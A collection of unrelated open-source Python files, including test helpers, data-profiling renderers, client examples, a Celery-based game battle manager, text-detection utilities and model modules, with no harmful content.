mel_i_prob = betabinom(phoneme_count, a, b).pmf(x)
mel_text_probs.append(mel_i_prob)
return np.array(mel_text_probs)
def mas(attn_map, width=1):
# assumes mel x text
opt = np.zeros_like(attn_map)
attn_map = np.log(attn_map)
attn_map[0, 1:] = -np.inf
log_p = np.zeros_like(attn_map)
log_p[0, :] = attn_map[0, :]
prev_ind = np.zeros_like(attn_map, dtype=np.int64)
for i in range(1, attn_map.shape[0]):
for j in range(attn_map.shape[1]):
prev_j = np.arange(max(0, j - width), j + 1)
prev_log = np.array([log_p[i - 1, prev_idx] for prev_idx in prev_j])
ind = np.argmax(prev_log)
log_p[i, j] = attn_map[i, j] + prev_log[ind]
prev_ind[i, j] = prev_j[ind]
# now backtrack
curr_text_idx = attn_map.shape[1] - 1
for i in range(attn_map.shape[0] - 1, -1, -1):
opt[i, curr_text_idx] = 1
curr_text_idx = prev_ind[i, curr_text_idx]
opt[0, curr_text_idx] = 1
assert opt.sum(0).all()
assert opt.sum(1).all()
return opt
def binarize_attention(attn, in_len, out_len):
b_size = attn.shape[0]
attn_cpu = attn
attn_out = np.zeros_like(attn)
for ind in range(b_size):
hard_attn = mas(attn_cpu[ind, 0, : out_len[ind], : in_len[ind]])
attn_out[ind, 0, : out_len[ind], : in_len[ind]] = hard_attn
return attn_out
|
tests/helpers.py | fernandobrito/diff_cover | 276 | 11156053 | """
Test helper functions.
"""
import os.path
import random
HUNK_BUFFER = 2
MAX_LINE_LENGTH = 300
LINE_STRINGS = ["test", "+ has a plus sign", "- has a minus sign"]
def fixture_path(rel_path):
"""
Returns the absolute path to a fixture file
given `rel_path` relative to the fixture directory.
"""
fixture_dir = os.path.join(os.path.dirname(__file__), "fixtures")
return os.path.join(fixture_dir, rel_path)
def load_fixture(rel_path, encoding=None):
"""
Return the contents of the file at `rel_path`
(relative path to the "fixtures" directory).
If `encoding` is not None, attempts to decode
the contents as `encoding` (e.g. 'utf-8').
"""
with open(fixture_path(rel_path), encoding=encoding or "utf-8") as fixture_file:
contents = fixture_file.read()
if encoding is not None and isinstance(contents, bytes):
contents = contents.decode(encoding)
return contents
def line_numbers(start, end):
"""
Return a list of line numbers, in [start, end] (inclusive).
"""
return list(range(start, end + 1))
def git_diff_output(diff_dict, deleted_files=None):
"""
Construct fake output from `git diff` using the description
defined by `diff_dict`, which is a dictionary of the form:
{
SRC_FILE_NAME: MODIFIED_LINES,
...
}
where `SRC_FILE_NAME` is the name of a source file in the diff,
and `MODIFIED_LINES` is a list of lines added or changed in the
source file.
`deleted_files` is a list of files that have been deleted
The content of the source files are randomly generated.
Returns a byte string.
"""
output = []
# Entries for deleted files
output.extend(_deleted_file_entries(deleted_files))
# Entries for source files
for (src_file, modified_lines) in diff_dict.items():
output.extend(_source_file_entry(src_file, modified_lines))
return "\n".join(output)
def _deleted_file_entries(deleted_files):
"""
Create fake `git diff` output for files that have been
deleted in this changeset.
`deleted_files` is a list of files deleted in the changeset.
Returns a list of lines in the diff output.
"""
output = []
if deleted_files is not None:
for src_file in deleted_files:
# File information
output.append(f"diff --git a/{src_file} b/{src_file}")
output.append("index 629e8ad..91b8c0a 100644")
output.append(f"--- a/{src_file}")
output.append("+++ b/dev/null")
# Choose a random number of lines
num_lines = random.randint(1, 30)
# Hunk information
output.append(f"@@ -0,{num_lines} +0,0 @@")
output.extend(["-" + _random_string() for _ in range(num_lines)])
return output
def _source_file_entry(src_file, modified_lines):
"""
Create fake `git diff` output for added/modified lines.
`src_file` is the source file with the changes;
`modified_lines` is the list of modified line numbers.
Returns a list of lines in the diff output.
"""
output = []
# Line for the file names
output.append(f"diff --git a/{src_file} b/{src_file}")
# Index line
output.append("index 629e8ad..91b8c0a 100644")
# Additions/deletions
output.append(f"--- a/{src_file}")
output.append(f"+++ b/{src_file}")
# Hunk information
for (start, end) in _hunks(modified_lines):
output.extend(_hunk_entry(start, end, modified_lines))
return output
def _hunk_entry(start, end, modified_lines):
"""
Generates fake `git diff` output for a hunk,
where `start` and `end` are the start/end lines of the hunk
and `modified_lines` is a list of modified lines in the hunk.
Just as `git diff` does, this will include a few lines before/after
the changed lines in each hunk.
"""
output = []
# The actual hunk usually has a few lines before/after
start -= HUNK_BUFFER
end += HUNK_BUFFER
start = max(start, 0)
# Hunk definition line
# Real `git diff` output would have different line numbers
# for before/after the change, but since we're only interested
# in after the change, we use the same numbers for both.
length = end - start
output.append("@@ -{0},{1} +{0},{1} @@".format(start, length))
# Output line modifications
for line_number in range(start, end + 1):
# This is a changed line, so prepend a + sign
if line_number in modified_lines:
# Delete the old line
output.append("-" + _random_string())
# Include the changed line
output.append("+" + _random_string())
# This is a line we didn't modify, so no + or - signs
# but prepend with a space.
else:
output.append(" " + _random_string())
return output
def _hunks(modified_lines):
"""
Given a list of line numbers, return a list of hunks represented
as `(start, end)` tuples.
"""
# Identify contiguous lines as hunks
hunks = []
last_line = None
for line in sorted(modified_lines):
# If this is contiguous with the last line, continue the hunk
# We're guaranteed at this point to have at least one hunk
if (line - 1) == last_line:
start, _ = hunks[-1]
hunks[-1] = (start, line)
# If non-contiguous, start a new hunk with just the current line
else:
hunks.append((line, line))
# Store the last line
last_line = line
return hunks
def _random_string():
"""
Return a random byte string with length in the range
[0, `MAX_LINE_LENGTH`] (inclusive).
"""
return random.choice(LINE_STRINGS)
|
src/pandas_profiling/report/structure/variables/render_url.py | abhicantdraw/pandas-profiling | 8,107 | 11156066 | <reponame>abhicantdraw/pandas-profiling
from pandas_profiling.config import Settings
from pandas_profiling.report.formatters import fmt, fmt_bytesize, fmt_percent
from pandas_profiling.report.presentation.core import (
Container,
FrequencyTable,
FrequencyTableSmall,
Table,
VariableInfo,
)
from pandas_profiling.report.presentation.frequency_table_utils import freq_table
from pandas_profiling.report.structure.variables.render_common import render_common
def render_url(config: Settings, summary: dict) -> dict:
varid = summary["varid"]
n_freq_table_max = config.n_freq_table_max
n_obs_cat = config.vars.cat.n_obs
redact = config.vars.cat.redact
template_variables = render_common(config, summary)
keys = ["scheme", "netloc", "path", "query", "fragment"]
for url_part in keys:
template_variables[f"freqtable_{url_part}"] = freq_table(
freqtable=summary[f"{url_part}_counts"],
n=summary["n"],
max_number_to_print=n_freq_table_max,
)
full_frequency_table = FrequencyTable(
template_variables["freq_table_rows"],
name="Full",
anchor_id=f"{varid}full_frequency",
redact=redact,
)
scheme_frequency_table = FrequencyTable(
template_variables["freqtable_scheme"],
name="Scheme",
anchor_id=f"{varid}scheme_frequency",
redact=redact,
)
netloc_frequency_table = FrequencyTable(
template_variables["freqtable_netloc"],
name="Netloc",
anchor_id=f"{varid}netloc_frequency",
redact=redact,
)
path_frequency_table = FrequencyTable(
template_variables["freqtable_path"],
name="Path",
anchor_id=f"{varid}path_frequency",
redact=redact,
)
query_frequency_table = FrequencyTable(
template_variables["freqtable_query"],
name="Query",
anchor_id=f"{varid}query_frequency",
redact=redact,
)
fragment_frequency_table = FrequencyTable(
template_variables["freqtable_fragment"],
name="Fragment",
anchor_id=f"{varid}fragment_frequency",
redact=redact,
)
items = [
full_frequency_table,
scheme_frequency_table,
netloc_frequency_table,
path_frequency_table,
query_frequency_table,
fragment_frequency_table,
]
template_variables["bottom"] = Container(
items, sequence_type="tabs", name="url stats", anchor_id=f"{varid}urlstats"
)
# Element composition
info = VariableInfo(
summary["varid"],
summary["varname"],
"URL",
summary["alerts"],
summary["description"],
)
table = Table(
[
{
"name": "Distinct",
"value": fmt(summary["n_distinct"]),
"alert": "n_distinct" in summary["alert_fields"],
},
{
"name": "Distinct (%)",
"value": fmt_percent(summary["p_distinct"]),
"alert": "p_distinct" in summary["alert_fields"],
},
{
"name": "Missing",
"value": fmt(summary["n_missing"]),
"alert": "n_missing" in summary["alert_fields"],
},
{
"name": "Missing (%)",
"value": fmt_percent(summary["p_missing"]),
"alert": "p_missing" in summary["alert_fields"],
},
{
"name": "Memory size",
"value": fmt_bytesize(summary["memory_size"]),
"alert": False,
},
]
)
fqm = FrequencyTableSmall(
freq_table(
freqtable=summary["value_counts_without_nan"],
n=summary["n"],
max_number_to_print=n_obs_cat,
),
redact=redact,
)
template_variables["top"] = Container([info, table, fqm], sequence_type="grid")
return template_variables
|
test/fixtures/python/matching/docstrings.py | matsubara0507/semantic | 8,844 | 11156075 | def foo():
"""here's a docstring"""
pass
def bar():
"""and another"""
pass
|
examples/client/threads/fiddle_client.py | flocko-motion/python-socketio | 2,977 | 11156076 | import socketio
sio = socketio.Client()
@sio.event
def connect():
print('connected to server')
@sio.event
def disconnect():
print('disconnected from server')
@sio.event
def hello(a, b, c):
print(a, b, c)
if __name__ == '__main__':
sio.connect('http://localhost:5000', auth={'token': '<PASSWORD>'})
sio.wait()
|
tests/trac/test-trac-0232.py | eLBati/pyxb | 123 | 11156087 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
import logging
if __name__ == '__main__':
logging.basicConfig()
_log = logging.getLogger(__name__)
import pyxb.binding.generate
import pyxb.utils.domutils
from pyxb.utils import six
from xml.dom import Node
import os.path
xsd='''<?xml version="1.0" encoding="UTF-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:complexType name="tNumber">
<xs:simpleContent>
<xs:extension base="xs:double">
<xs:attribute name="scale" type="xs:int"/>
</xs:extension>
</xs:simpleContent>
</xs:complexType>
<xs:element name="number" type="tNumber"/>
<xs:element name="numbers">
<xs:complexType>
<xs:sequence>
<xs:element ref="number"/>
</xs:sequence>
</xs:complexType>
</xs:element>
</xs:schema>
'''
code = pyxb.binding.generate.GeneratePython(schema_text=xsd)
#print code
rv = compile(code, 'test', 'exec')
eval(rv)
from pyxb.exceptions_ import *
import unittest
class TestTrac0232 (unittest.TestCase):
def testValid (self):
instance = CreateFromDocument('<numbers><number scale="2">1.5</number></numbers>')
self.assertEqual(1.5, instance.number.value())
self.assertEqual(2, instance.number.scale)
def testInvalidElement (self):
with self.assertRaises(pyxb.SimpleTypeValueError) as cm:
instance = CreateFromDocument('''<numbers>
<number>1x5</number>
</numbers>''')
e = cm.exception
# NB: Location is the start tag of the containing element
if e.location is not None:
self.assertEqual(2, e.location.lineNumber)
self.assertEqual(0, e.location.columnNumber)
def testInvalidAttribute (self):
with self.assertRaises(pyxb.SimpleTypeValueError) as cm:
instance = CreateFromDocument('''<numbers><number scale="c">1.5</number></numbers>''')
e = cm.exception
# NB: Location is the start tag of the containing element
if e.location is not None:
self.assertEqual(1, e.location.lineNumber)
self.assertEqual(9, e.location.columnNumber)
if __name__ == '__main__':
unittest.main()
|
boto/beanstalk/exception.py | Yurzs/boto | 5,079 | 11156124 | <reponame>Yurzs/boto
import sys
from boto.compat import json
from boto.exception import BotoServerError
def simple(e):
code = e.code
if code.endswith('Exception'):
code = code.rstrip('Exception')
try:
# Dynamically get the error class.
simple_e = getattr(sys.modules[__name__], code)(e)
except AttributeError:
# Return original exception on failure.
return e
return simple_e
class SimpleException(BotoServerError):
def __init__(self, e):
super(SimpleException, self).__init__(e.status, e.reason, e.body)
self.error_message = self.message
def __repr__(self):
return self.__class__.__name__ + ': ' + self.error_message
def __str__(self):
return self.__class__.__name__ + ': ' + self.error_message
class ValidationError(SimpleException): pass
# Common beanstalk exceptions.
class IncompleteSignature(SimpleException): pass
class InternalFailure(SimpleException): pass
class InvalidAction(SimpleException): pass
class InvalidClientTokenId(SimpleException): pass
class InvalidParameterCombination(SimpleException): pass
class InvalidParameterValue(SimpleException): pass
class InvalidQueryParameter(SimpleException): pass
class MalformedQueryString(SimpleException): pass
class MissingAction(SimpleException): pass
class MissingAuthenticationToken(SimpleException): pass
class MissingParameter(SimpleException): pass
class OptInRequired(SimpleException): pass
class RequestExpired(SimpleException): pass
class ServiceUnavailable(SimpleException): pass
class Throttling(SimpleException): pass
# Action specific exceptions.
class TooManyApplications(SimpleException): pass
class InsufficientPrivileges(SimpleException): pass
class S3LocationNotInServiceRegion(SimpleException): pass
class TooManyApplicationVersions(SimpleException): pass
class TooManyConfigurationTemplates(SimpleException): pass
class TooManyEnvironments(SimpleException): pass
class S3SubscriptionRequired(SimpleException): pass
class TooManyBuckets(SimpleException): pass
class OperationInProgress(SimpleException): pass
class SourceBundleDeletion(SimpleException): pass
|
samples/tutorials/python/jupyter/sample_python_jupyter.py | manikanth/sql-server-samples | 4,474 | 11156130 | <reponame>manikanth/sql-server-samples
import pyodbc
server = 'myserver'
database = 'mydb'
username = 'myusername'
password = '<PASSWORD>'
#Connection String
connection = pyodbc.connect('DRIVER={SQL Server Native Client 11.0};SERVER='+server+';DATABASE='+database+';UID='+username+';PWD='+ password)
cursor = connection.cursor()
#Sample select query
cursor.execute("SELECT @@version;")
row = cursor.fetchone()
while row:
print row[0]
row = cursor.fetchone()
|
alipay/aop/api/response/KoubeiRetailWmsInboundorderBatchqueryResponse.py | snowxmas/alipay-sdk-python-all | 213 | 11156152 | <reponame>snowxmas/alipay-sdk-python-all
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.InboundOrderVO import InboundOrderVO
class KoubeiRetailWmsInboundorderBatchqueryResponse(AlipayResponse):
def __init__(self):
super(KoubeiRetailWmsInboundorderBatchqueryResponse, self).__init__()
self._inbound_order_vo_list = None
@property
def inbound_order_vo_list(self):
return self._inbound_order_vo_list
@inbound_order_vo_list.setter
def inbound_order_vo_list(self, value):
if isinstance(value, list):
self._inbound_order_vo_list = list()
for i in value:
if isinstance(i, InboundOrderVO):
self._inbound_order_vo_list.append(i)
else:
self._inbound_order_vo_list.append(InboundOrderVO.from_alipay_dict(i))
def parse_response_content(self, response_content):
response = super(KoubeiRetailWmsInboundorderBatchqueryResponse, self).parse_response_content(response_content)
if 'inbound_order_vo_list' in response:
self.inbound_order_vo_list = response['inbound_order_vo_list']
|
tests/test_dict_loading.py | insolor/pymorphy2 | 859 | 11156181 | <reponame>insolor/pymorphy2
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import pytest
import pymorphy2
from pymorphy2.analyzer import lang_dict_path
def test_old_dictionaries_supported():
pytest.importorskip("pymorphy2_dicts")
m = pymorphy2.MorphAnalyzer(lang='ru-old')
assert m.lang == 'ru-old'
assert m.tag('стиль')[0].POS == 'NOUN'
def test_old_dictionaries_not_installed():
try:
import pymorphy2_dicts
pytest.skip("pymorphy2_dicts package is installed")
except ImportError:
pass
with pytest.raises(ValueError):
pymorphy2.MorphAnalyzer(lang='ru-old')
def test_old_dictionaries_supported_by_path():
pymorphy2_dicts = pytest.importorskip("pymorphy2_dicts")
m = pymorphy2.MorphAnalyzer(pymorphy2_dicts.get_path())
assert m.lang == 'ru'
assert m.tag('стиль')[0].POS == 'NOUN'
def test_morph_analyzer_bad_path():
with pytest.raises(IOError):
pymorphy2.MorphAnalyzer("/sdfgsd/gdsfgsdfg/dfgdsfg/dsfgsdfg/as")
def test_language_from_dict():
ru_path = lang_dict_path('ru')
m = pymorphy2.MorphAnalyzer(path=ru_path)
assert m.lang == 'ru'
def test_bad_language():
with pytest.raises(ValueError):
pymorphy2.MorphAnalyzer(lang='something-unsupported')
def test_nonmatching_language():
ru_path = lang_dict_path('ru')
m = pymorphy2.MorphAnalyzer(path=ru_path, lang='uk')
assert 'Init' in m.parse('Ї')[0].tag
assert m.lang == 'uk'
|
ports/nrf/freeze/test.py | sebastien-riou/micropython | 13,648 | 11156193 | import sys
def hello():
print("Hello %s!" % sys.platform)
|
manager/celery_.py | Jamie-505/playground | 725 | 11156201 | # TODO: Add Documentation.
from collections import defaultdict
import os
import random
import shutil
import sys
import time
import traceback
import docker
from celery import Celery
import requests
import subprocess
sys.path.insert(1, os.path.join(sys.path[0], '..'))
import pommerman
client = docker.from_env()
client.login(
os.getenv("PLAYGROUND_DOCKER_LOGIN"),
os.getenv("PLAYGROUND_DOCKER_PASSWORD"))
game_directory = os.path.expanduser('~/battles')
json_directory = os.path.join(game_directory, 'json')
png_directory = os.path.join(game_directory, 'png')
if not os.path.exists(json_directory):
os.makedirs(json_directory)
if not os.path.exists(png_directory):
os.makedirs(png_directory)
celery = Celery("playground")
celery.conf.broker_url = 'redis://localhost:6379/0'
@celery.task
def run_test(docker_build_path, github_repo, private_key, name, agent_id, user,
config):
user = user.lower()
name = name.lower()
record_pngs_dir = os.path.join(png_directory, 'test-%s-%s' % (user, name))
record_json_dir = os.path.join(json_directory, 'test-%s-%s' % (user, name))
test = Test(name, user, config, private_key, github_repo, agent_id,
docker_build_path, record_pngs_dir, record_json_dir)
return test.run()
server_ready_notifs = defaultdict(set)
@celery.task
def add_server_ready_notif(notif):
"""Add this notification to the queue. Run battle if it completes a set."""
battle_info = notif['battle_info']
server_ready_notifs[battle_info].add(notif)
battle_notifs = server_ready_notifs[battle_info]
if len(battle_notifs) > 4:
logging.warn("We have too many battle notifs. How did this happen?")
logging.warn(", ".join([
"{}.{}.{}".format(notif['agent_id'], notif['aid'],
notif['docker_image']) for notif in battle_notifs
]))
elif len(battle_notifs) == 4:
# Everyone is ready. Let's do this.
battle_notifs = sorted(list(battle_notifs), key=lambda k: k['agent_id'])
agents = {k:v for k, v in battle_notifs \
if k in ['aid', 'docker_image', 'agent_id']}
run_battle(battle_info, agents)
del server_ready_notifs[battle_info]
# TODO: Ensure there is >1 worker to accept requests while battles occur.
@celery.task
def run_battle(battle_info, agents):
"""Agents is a list of dicts specifying docker image, aid, and agent_id."""
suffix = battle_info
record_pngs_dir = os.path.join(png_directory, suffix)
record_json_dir = os.path.join(json_directory, suffix)
battle = Battle(agents, record_pngs_dir, record_json_dir)
info = battle.run()
logging.warn("Info from the run_battle on %s:" % battle_info)
logging.warn(info)
# Tell the server about the result.
request_json = {
'result': info['result'].value,
'winners': info.get('winners', []),
'battle_info': battle_info,
'access': os.getenv("PLAYGROUND_GAME_MANAGER_ACCESS")
}
request_url = os.getenv("PLAYGROUND_SERVER_URL") + "/admin/report_result"
requests.post(request_url, json=request_json)
class Battle(object):
def __init__(self, agents, record_pngs_dir, record_json_dir):
"""A battle object.
Args:
agents: A list of dicts with agent_id, aid, and docker_image.
record_pngs_dir: The string directory path to place recorded pngs.
record_json_dir: The string directory path to place recorded json.
"""
self._agents = agents
self._record_pngs_dir = record_pngs_dir
self._record_json_dir = record_json_dir
def run(self):
# At this point, we can assume that the containers have been pulled.
# We now start the game, which notifies those containers to start the
# agents and let us know they're ready.
agents = [
"docker::%s" % agent['docker_image'] for agent in self._agents
]
agents = ",".join(agents)
args = Args(
agents,
self._config,
self._record_pngs_dir,
self._record_json_dir,
agent_env_vars,
None,
render,
do_sleep=False)
seed = os.getenv("PLAYGROUND_GAME_SEED")
infos = pommerman.cli.run_battle.run(args, num_times=1, seed=seed)
return infos[0]
# TODO: Add logging in case the post fails.
@staticmethod
def _fail(aids, error):
"""Sends ping to server that this was a failed battle."""
request_url = os.getenv('PLAYGROUND_SERVER_URL') + '/fail_battle'
requests.post(
request_url,
json={
"aids": aids,
"error": error,
"access": os.getenv('PLAYGROUND_GAME_MANAGER_ACCESS')
})
# TODO: Add logging in case the post fails.
@staticmethod
def _pass(aids, info):
"""Sends ping that this was a successful test."""
request_url = os.getenv('PLAYGROUND_SERVER_URL') + '/pass_battle'
requests.post(
request_url,
json={
"aids": aids,
"info": info,
"access": os.getenv('PLAYGROUND_GAME_MANAGER_ACCESS')
})
class Test(object):
def __init__(self, name, user, config, private_key, github_repo, agent_id,
docker_build_path, record_pngs_dir, record_json_dir):
self._name = name
self._user = user
self._config = config
self._private_key = private_key
self._github_repo = github_repo
self._agent_id = agent_id
self._docker_build_path = docker_build_path
self._record_pngs_dir = record_pngs_dir
self._record_json_dir = record_json_dir
def run(self):
img = None
message = None
for func in [
lambda: save_ssh_pk(name, private_key),
lambda: download_repo(name, github_repo),
lambda: docker_build(docker_build_path, name, user),
lambda: self._battle(num_times=5, agent_env_vars={},
render=True, seed=1)
]:
# TODO: This won't be necessary if we can fix the image purging.
is_success, ret = func()
if type(ret) == docker.models.images.Image:
img = ret
else:
message = ret
if not is_success:
return self._fail(agent_id, ret)
# This has been successful. Hurray.
# Push the Docker image to the cloud and then clean it up.
docker_push_and_clean_up(img, name, user)
return self._pass(agent_id, message)
# TODO: Add logging in case the post fails.
@staticmethod
def _fail(agent_id, error):
"""Sends ping to server that this was a failed test."""
request_url = os.getenv('PLAYGROUND_SERVER_URL') + '/fail_test'
requests.post(
request_url,
json={
"agent_id": agent_id,
"error": error,
"access": os.getenv('PLAYGROUND_GAME_MANAGER_ACCESS')
})
# TODO: Add logging in case the post fails.
@staticmethod
def _pass(agent_id, win_percent):
"""Sends ping that this was a successful test."""
request_url = os.getenv('PLAYGROUND_SERVER_URL') + '/pass_test'
requests.post(
request_url,
json={
"agent_id": agent_id,
"win_percent": win_percent,
"access": os.getenv('PLAYGROUND_GAME_MANAGER_ACCESS')
})
def _battle(self, num_times, agent_env_vars, render, seed=None):
return battle(num_times, agent_env_vars, render, seed, self._user,
self._name, self._config, self._record_pngs_dir,
self._record_json_dir)
def battle(num_times, agent_env_vars, render, seed, user, name, config,
record_pngs_dir, record_json_dir):
try:
agents = ["test::agents.SimpleAgent"] * 3
agent_id = random.randint(0, len(agents))
agent_tag = "docker::multiagentlearning/pommerman-%s-%s" % (user, name)
agents.insert(agent_id, agent_tag)
agents = ",".join(agents)
args = Args(
agents,
config,
record_pngs_dir,
record_json_dir,
agent_env_vars,
None,
render,
do_sleep=True)
infos = []
infos = pommerman.cli.run_battle.run(
args, num_times=num_times, seed=seed)
win_count = len([i for i in infos if 'winners' in i \
and agent_id in i['winners']])
win_percent = 1. * win_count / len(infos)
return True, win_percent, info
except Exception as e:
traceback.print_exc()
return False, "battle: %s" % e
def save_ssh_pk(name, private_key):
try:
path = os.path.expanduser('~/.ssh/id_%s' % name)
if os.path.exists(path):
os.remove(path)
with os.fdopen(os.open(path, os.O_WRONLY | os.O_CREAT, 0o600),
'w') as f:
f.write(private_key)
return True, ""
except Exception as e:
return False, "save_ssh_pk: %s" % e
def download_repo(name, github_repo):
try:
directory = os.path.expanduser('~/Repos/%s' % name)
if os.path.exists(directory):
shutil.rmtree(directory)
from git import Repo
from git import Git
git_ssh_identity_file = os.path.expanduser('~/.ssh/id_%s' % name)
git_ssh_cmd = 'ssh -i %s' % git_ssh_identity_file
Repo.clone_from(
github_repo, directory, env={
'GIT_SSH_COMMAND': git_ssh_cmd
})
return True, ""
except Exception as e:
return False, "download_repo: %s" % e
def docker_build(docker_build_path, name, user):
try:
repo_path = os.path.join(os.path.expanduser('~/Repos'), name)
img = client.images.build(
path=repo_path,
dockerfile=docker_build_path,
tag='multiagentlearning/pommerman-%s-%s' % (user, name))
return True, img
except Exception as e:
return False, "docker_build: %s" % e
def docker_push_and_clean_up(img, name, user):
try:
client.images.push("multiagentlearning/pommerman-%s-%s" % (user, name))
# TODO: Fix this so that it purges correctly.
# ... Consider just using subprocess(docker system prune -a -f)
client.images.prune("%s-%s" % (user, name), filters={'dangling': False})
return True
except Exception as e:
print("push / clean up: ", e)
traceback.print_exc()
return False
class Args(object):
"""Args object to replicate the args in run_battle."""
def __init__(self, agents, config, record_pngs_dir, record_json_dir,
agent_env_vars, game_state_file, render, do_sleep):
self.config = config
self.record_pngs_dir = record_pngs_dir
self.record_json_dir = record_json_dir
self.agent_env_vars = agent_env_vars
self.game_state_file = game_state_file
self.render = render
self.render_mode = 'human'
self.agents = agents
self.do_sleep = do_sleep
|
example.py | zhiburt/rtoml | 136 | 11156217 | from datetime import datetime, timezone, timedelta
import rtoml
obj = {
'title': 'TOML Example',
'owner': {
'dob': datetime(1979, 5, 27, 7, 32, tzinfo=timezone(timedelta(hours=-8))),
'name': '<NAME>',
},
'database': {
'connection_max': 5000,
'enabled': True,
'ports': [8001, 8001, 8002],
'server': '192.168.1.1',
},
}
loaded_obj = rtoml.load("""\
# This is a TOML document.
title = "TOML Example"
[owner]
name = "<NAME>"
dob = 1979-05-27T07:32:00-08:00 # First class dates
[database]
server = "192.168.1.1"
ports = [8001, 8001, 8002]
connection_max = 5000
enabled = true
""")
assert loaded_obj == obj
assert rtoml.dumps(obj) == """\
title = "TOML Example"
[owner]
dob = 1979-05-27T07:32:00-08:00
name = "<NAME>"
[database]
connection_max = 5000
enabled = true
server = "192.168.1.1"
ports = [8001, 8001, 8002]
"""
|
utils/inference_util.py | RubanSeven/CRAFT_keras | 176 | 11156276 | # -*- coding: utf-8 -*-
# @Author: Ruban
# @License: Apache Licence
# @File: inference_util.py
import cv2
import math
import numpy as np
def getDetBoxes_core(text_map, link_map, text_threshold, link_threshold, low_text):
# prepare data
link_map = link_map.copy()
text_map = text_map.copy()
img_h, img_w = text_map.shape
""" labeling method """
ret, text_score = cv2.threshold(text_map, low_text, 1, 0)
ret, link_score = cv2.threshold(link_map, link_threshold, 1, 0)
text_score_comb = np.clip(text_score + link_score, 0, 1)
label_n, labels, stats, centroids = cv2.connectedComponentsWithStats(text_score_comb.astype(np.uint8),
connectivity=4)
det = []
mapper = []
for k in range(1, label_n):
# size filtering
size = stats[k, cv2.CC_STAT_AREA]
if size < 10:
continue
# thresholding
if np.max(text_map[labels == k]) < text_threshold:
continue
x, y = stats[k, cv2.CC_STAT_LEFT], stats[k, cv2.CC_STAT_TOP]
w, h = stats[k, cv2.CC_STAT_WIDTH], stats[k, cv2.CC_STAT_HEIGHT]
niter = int(math.sqrt(size * min(w, h) / (w * h)) * 2)
sx, ex, sy, ey = x - niter, x + w + niter + 1, y - niter, y + h + niter + 1
# boundary check
if sx < 0:
sx = 0
if sy < 0:
sy = 0
if ex >= img_w:
ex = img_w
if ey >= img_h:
ey = img_h
tmp_text_map = text_map[sy:ey, sx:ex]
tmp_labels = labels[sy:ey, sx:ex]
tmp_link_score = link_score[sy:ey, sx:ex]
tmp_text_score = text_score[sy:ey, sx:ex]
# make segmentation map
segmap = np.zeros(tmp_text_map.shape, dtype=np.uint8)
segmap[tmp_labels == k] = 255
segmap[np.logical_and(tmp_link_score == 1, tmp_text_score == 0)] = 0 # remove link area
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (1 + niter, 1 + niter))
segmap = cv2.dilate(segmap, kernel)
# make box
np_contours = np.roll(np.array(np.where(segmap != 0)), 1, axis=0).transpose().reshape(-1, 2)
rectangle = cv2.minAreaRect(np_contours)
box = cv2.boxPoints(rectangle)
# align diamond-shape
w, h = np.linalg.norm(box[0] - box[1]), np.linalg.norm(box[1] - box[2])
box_ratio = max(w, h) / (min(w, h) + 1e-5)
if abs(1 - box_ratio) <= 0.1:
l, r = min(np_contours[:, 0]), max(np_contours[:, 0])
t, b = min(np_contours[:, 1]), max(np_contours[:, 1])
box = np.array([[l, t], [r, t], [r, b], [l, b]], dtype=np.float32)
# make clock-wise order
start_idx = box.sum(axis=1).argmin()
box = np.roll(box, 4 - start_idx, 0)
box = np.array(box)
box += (sx, sy)
det.append(box)
mapper.append(k)
return det, labels, mapper
def getDetBoxes(text_map, link_map, text_threshold, link_threshold, low_text):
boxes, labels, mapper = getDetBoxes_core(text_map, link_map, text_threshold, link_threshold, low_text)
return boxes
def adjustResultCoordinates(polys, ratio_w, ratio_h, ratio_net=2):
if len(polys) > 0:
polys = np.array(polys)
polys *= (ratio_w * ratio_net, ratio_h * ratio_net)
# for k in range(len(polys)):
# if polys[k] is not None:
# polys[k] *= (ratio_w * ratio_net, ratio_h * ratio_net)
return polys
|
softlearning/replay_pools/replay_pool.py | limash/softlearning | 920 | 11156299 | <filename>softlearning/replay_pools/replay_pool.py
import abc
class ReplayPool(object):
"""A class used to save and replay data."""
@abc.abstractmethod
def add_sample(self, sample):
"""Add a transition tuple."""
pass
@abc.abstractmethod
def terminate_episode(self):
"""Clean up pool after episode termination."""
pass
@property
@abc.abstractmethod
def size(self, **kwargs):
pass
@property
@abc.abstractmethod
def add_path(self, path):
"""Add a rollout to the replay pool."""
pass
@abc.abstractmethod
def random_batch(self, batch_size):
"""Return a random batch of size `batch_size`."""
pass
|
setup.py | dendisuhubdy/attention-lvcsr | 295 | 11156307 | from os import path
from setuptools import find_packages, setup
here = path.abspath(path.dirname(__file__))
setup(
name='lvsr',
description='Fully Neural LVSR',
url='https://github.com/rizar/fully-neural-lvsr',
author='<NAME>',
license='MIT',
packages=find_packages(exclude=['examples', 'docs', 'tests']),
zip_safe=False,
install_requires=['numpy', 'pykwalify', 'toposort', 'pyyaml',
'picklable-itertools', 'pandas', 'pyfst']
)
|
zeus/modules/tensformers/output.py | shaido987/vega | 240 | 11156317 | # -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""This is Output classes."""
from zeus.modules.operators import ops
from zeus.modules.module import Module
from zeus.common.class_factory import ClassType, ClassFactory
@ClassFactory.register(ClassType.NETWORK)
class BertOutput(Module):
"""Bert Output."""
def __init__(self, config):
super(BertOutput, self).__init__()
self.dense = ops.Linear(config.intermediate_size, config.hidden_size)
self.LayerNorm = ops.LayerNorm(config.hidden_size, eps=1e-12)
self.dropout = ops.Dropout(config.hidden_dropout_prob)
def call(self, hidden_states, input_tensor):
"""Call BertOutput."""
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
@ClassFactory.register(ClassType.NETWORK)
class BertSelfOutput(Module):
"""Bert Self Output."""
def __init__(self, config):
super(BertSelfOutput, self).__init__()
self.dense = ops.Linear(config.hidden_size, config.hidden_size)
